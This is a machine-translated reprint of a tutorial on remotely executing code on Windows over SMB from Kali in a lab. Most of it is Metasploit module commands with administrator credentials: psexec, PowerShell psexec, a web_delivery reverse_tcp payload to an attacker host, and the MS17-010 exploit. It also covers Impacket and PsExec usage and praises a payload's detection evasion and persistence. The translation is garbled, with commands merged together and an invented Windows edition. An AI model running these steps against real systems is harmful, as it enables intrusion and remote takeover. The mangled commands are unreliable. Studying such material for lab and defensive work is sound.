Shulou(Shulou.com)06/02 Report--

This article mainly shows you "what are the ways to connect PC remotely using SMB port", the content is simple and clear, and I hope it can help you solve your doubts. Let me lead you to study and learn about "what are the ways to remotely connect to PC using SMB port".

Research equipment

Target host: Windows Server 2008 R2

Attack device: Kali Linux

Microsoft Windows authenticated user code execution

This module can execute an arbitrary Payload with a valid administrator username and password (or password hash), which is very similar to the "psexec" utility provided by SysInternals, and now automatically cleans up traces after the attack is completed. The service created by this tool uses a randomly selected user name and related description.

Msf > useexploit/windows/smb/psexecmsf exploitwindows/smb/psexec) > set rhost 192.168.1.104msf exploit (windows/smb/psexec) > set smbuser administratormsf exploit (windows/smb/psexec) > set smbpass Ignite@123msf exploit (windows/smb/psexec) > exploit

Note:

Rhost- > IP address of the destination PC smbuser- > username smbpass- > password

After running the above command, you will get the meterpreter session of the target PC, and then you can access the resources on the target system.

Microsoft Windows authentication Powershell command execution

This module can use a valid administrator username and password to execute Powershell Payload, and the technology used here is similar to that used by "psexec". Payload is base64 encoded and can be executed from the command line interface using the-encoded command option. This method does not write Payload to the disk of the target device, and each generated Payload is unique, which makes it less likely to be detected by signature-based detection schemes. In order to achieve persistent infection, the module also provides persistence options and continuously executes Payload through the while loop. Through the analysis, we also found that the implementation of PSH also added delay and confusion techniques to avoid detection. To avoid popping up interactive process notifications (which may arouse suspicion among users), the size of the psh Payload is greatly reduced and encapsulated in a Powershell call (completely hidden in the window).

Msf > useexploit/windows/smb/psexec_psh

Msf exploit (windows/smb/psexec_psh) > setrhost 192.168.1.104

Msf exploit (windows/smb/psexec_psh) > set smbuser administrator

Msf exploit (windows/smb/psexec_psh) > set smbpass Ignite@123

Msf exploit (windows/smb/psexec_psh) > exploit

After running the above command, you will get the meterpreter session of the target PC, and then...

Microsoft Windows Certified Manager Utility

This module can use a valid administrator username and password to execute arbitrary commands on one or more hosts, and this module is very useful because it does not need to upload any code to the target host. Therefore, in a new metasploit framework, we can use the Web sending module to obtain malicious dll code and implement arbitrary command execution on the target host.

Useexploit/multi/script/web_deliverymsfexploit (multi/script/web_delivery) > set target 3msfexploit (multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcpmsfexploit (multi/script/web_delivery) > set lhost 192.168.1.106msfexploit (multi/script/web_delivery) > exploit

Copy the framed code in the image above, which is our malicious dll code.

Msf > use auxiliary/admin/smb/psexec_commandmsfauxiliary (admin/smb/psexec_command) > set rhosts 192.168.1.104msfauxiliary (admin/smb/psexec_command) > set smbuser administratormsfauxiliary (admin/smb/psexec_command) > set smbpass Ignite@123msfauxiliary (admin/smb/psexec_command) > set COMMAND [Paste above copied dllcode here] msfauxiliary (admin/smb/psexec_command) > exploit

When we have run the psexec auxiliary module, we will get a meterpreter session with administrator privileges.

SMB Impacket WMI Exec

This module is used in a similar way to psexec, but it mainly implements command execution through WMI.

Msf > use auxiliary/scanner/smb/impacket/wmiexecmsfauxiliary (scanner/smb/impacket/wmiexec) > set rhosts 192.168.1.104msfauxiliary (scanner/smb/impacket/wmiexec) > set smbuser administratormsfauxiliary (scanner/smb/impacket/wmiexec) > set smbpass Ignite@123msfauxiliary (scanner/smb/impacket/wmiexec) > set COMMAND systeminfomsfauxiliary (scanner/smb/impacket/wmiexec) > exploit

Impacket for Psexec.py

Psexec.py can execute processes, copy files, process output, and return stream data on remote Windows systems. It can execute shell commands remotely in a fully interactive command console without installing any client software. Now, we need to install the Impacket tool from GitHub first. First clone git, then install Impacket, and then run psexec.py to establish a connection to the target host.

Git clone https://github.com/CoreSecurity/impacket.gitcd impacket/python setup.py installcd examples statement:. / psexec.py [[domain/] username [: password] @] [Target IP Address]

Impacket for Atexec.py

This sample can implement command execution on the target host through the Task scheduling Service (Task Scheduler) and return the output after the command execution.

. / atexec.pySERVER/Administrator:Ignite123@192.168.1.104 systeminfo

Statement:

/ atexec.py [[domain/] username [: password] @] [Target IP Address] [Command]

You can see from the following figure that the remote connection to the server has been established, the command systeminfo will be executed on the target server, and the output will be returned directly to the terminal window of Kali.

PsExec.exe

PsExec.exe software can help us access other hosts in the target network, and it can get the shell of remote PC in an automated way.

PsExec.exe download address: [click me to download]

After downloading, extract the file and enter the following command in the command line window:

PsExec.exe\\ 192.168.1.104 Muru administrator-p Ignite@123 cmd

Note:

192.168.1.104-> IP address of the remote host-u-> specify user name-p-> specify password cmd- > enter command

MS17-010EternalRomance SMB remote code execution

Test equipment: Windows 2007 Ultimate Edition

Attack device: Kali Linux

This module exploits SMB and MS17-010 vulnerabilities to achieve arbitrary data writing, and eventually rewrites the connection information of the target session, which is then converted into an administrator session.

Msf > use exploit/windows/smb/ms17_010_psexecmsfexploit (windows/smb/ms17_010_psexec) > set rhost 192.168.1.105msfexploit (windows/smb/ms17_010_psexec) > set smbuser rajmsfexploit (windows/smb/ms17_010_psexec) > set smbpass 123msfexploit (windows/smb/ms17_010_psexec) > exploit

These are all the contents of this article entitled "what are the ways to remotely connect to PC using SMB ports?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.